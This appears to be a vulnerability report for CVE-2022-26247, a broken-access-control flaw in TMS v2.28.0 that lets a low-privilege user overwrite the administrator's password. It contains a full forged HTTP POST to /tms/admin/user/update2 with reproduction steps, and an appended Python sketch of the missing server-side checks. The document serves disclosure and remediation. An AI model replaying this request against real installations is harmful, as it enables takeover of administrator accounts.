CVE-2022-26247: There is a Insecure Permissions vulnerability exists in tms · Issue #16 · xiweicheng/tms

TMS v2.28.0 contains an insecure permissions vulnerability via the component /TMS/admin/user/Update2. This vulnerability allows attackers to modify the administrator account and password.

[Suggested description]
There is an ultra vires vulnerability in the function of modifying personal information in TMS. The vulnerability originates from /TMS/admin/user/Update2. The administrator account and password can be modified beyond the user's authority by modifying the packet parameters.

[Vulnerability Type]
Insecure Permissions

[Vendor of Product]
https://github.com/xiweicheng/tms

[Affected Product Code Base]
v2.28.0

[Affected Component]
POST /tms/admin/user/update2 HTTP/1.1
Host: localhost:8080
Content-Length: 66
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8080/
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/tms/admin/user
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=B45BEAFD82AAE86E3D98FE866FA0851E; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1645604517; Hm_lpvt_a4980171086658b20eb2d9b523ae1b7b=1645604534
Connection: close

username=admin&password=88888888&name=admin&mail=admin%40google.com&=

[Attack Type]
Remote

[Vulnerability proof]

1. Access with test account: http://localhost:8080/tms/admin

2. In order to verify the authenticity of the ultra vires vulnerability, I have prepared a system administrator account. Account number: admin, default password: 88888888.
Now I log in to the test account to try to change the information and password of the admin account.

3. Click the user icon in the upper right corner and select Modify in the drop-down box to open the modify personal information pop-up window.

4. Because there is no need to verify the user's original password, you can set the new password directly. Here, the password is set as change123 in the form submission, and other information will not be changed. Open the Burp Suite packet capturing proxy -> click the confirm submit button.

5. Modify the packet capture data, as shown in the following figure.

6. Click Forward to finish the modification.

Viewing the admin's information shows that it has changed. Vulnerability reproduction completed.
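The report shows two missing server-side checks: the account to change is taken from the request body, and a new password is accepted without the current one. The framework-neutral sketch below is an added example, not code from the TMS project; the role names, the currentPassword field, the "test" account's password and the sample body are assumptions constructed for illustration.

```python
import hashlib
import hmac
import os
from dataclasses import dataclass
from urllib.parse import parse_qs


@dataclass
class Account:
    role: str        # "admin" or "user" (role names are assumptions)
    salt: bytes
    pw_hash: bytes


def hash_pw(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def make_account(role: str, password: str) -> Account:
    salt = os.urandom(16)
    return Account(role, salt, hash_pw(password, salt))


def authorize_update(session_user: str, body: str, accounts: dict) -> tuple:
    """Decide whether a profile-update form from session_user may be applied."""
    form = {k: v[0] for k, v in parse_qs(body).items()}
    actor = accounts[session_user]
    # The account to change defaults to the caller; a body-supplied
    # username is only a request, never proof of identity.
    target = form.get("username", session_user)
    if target not in accounts:
        return (False, "unknown target")
    if target != session_user and actor.role != "admin":
        return (False, "target differs from session user")
    # Changing your own password requires re-entering the current one.
    # "currentPassword" is a hypothetical field name.
    if "password" in form and target == session_user:
        supplied = hash_pw(form.get("currentPassword", ""), actor.salt)
        if not hmac.compare_digest(supplied, actor.pw_hash):
            return (False, "current password required")
    return (True, "ok")


def demo_accounts() -> dict:
    # Constructed sample data; the "test" password is made up.
    return {"admin": make_account("admin", "88888888"),
            "test": make_account("user", "test-pass")}


# Constructed body shaped like the captured request, sent in the "test" session.
FORGED = "username=admin&password=change123&name=admin&mail=admin%40google.com&="
```

Calling authorize_update("test", FORGED, demo_accounts()) rejects the request because the body names an account other than the session's, which is the check the reported endpoint lacks.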
